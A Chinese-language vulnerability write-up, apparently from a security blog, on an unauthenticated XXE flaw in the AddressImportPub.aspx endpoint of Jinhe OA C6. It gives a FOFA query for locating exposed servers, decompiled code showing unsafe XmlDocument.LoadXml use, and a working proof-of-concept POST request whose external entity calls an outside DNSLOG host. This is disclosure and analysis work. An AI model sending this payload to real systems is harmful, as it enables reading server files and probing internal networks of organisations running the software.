金和OA AddressImportPub.aspx XXE漏洞


漏洞简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 AddressImportPub.aspx 接口处存在XXE漏洞,未授权的攻击者可以通过此漏洞读取服务器上敏感文件或探测内网服务信息,进一步利用可导致服务器失陷。

影响版本

金和OA C6

fofa语法

app="金和网络-金和OA"

漏洞分析

直接根据 AddressImportPub.aspx 在 bin 目录下查找 JHSoft.Web.Addressbook.dll 将其进行反编译后找到 AddressImportPub 的处理逻辑

namespace JHSoft.Web.AddressBook;

public class AddressImportPub : Page
{
  protected void Page_Load(object sender, EventArgs e)
  {
    if (((Control) this).Page.IsPostBack)
      return;
    ((Control) this).Context.Response.Write(this.GetXmlInfoAndSave());
  }

跟进 GetXmlInfoAndSave 方法

private string GetXmlInfoAndSave()
{
  string strSql = "";
  string end = ((TextReader) new StreamReader(this.Request.InputStream)).ReadToEnd();
  XmlDocument xmlDocument = new XmlDocument();
  xmlDocument.LoadXml(end);

请求内容直接使 xmlDocument.LoadXml 加载处理,造成XXE漏洞。

漏洞复现

POST /c6/Jhsoft.Web.addressbook/AddressImportPub.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxe.dnslog.pt/xxe_test">
%remote;]>
<root/>

在DNSLOG平台成功收到请求


手机扫码阅读

西部数码 NAS elephant_drive.php 命令执行漏洞

西部数码 NAS safepoints_api.php 命令执行漏洞

评 论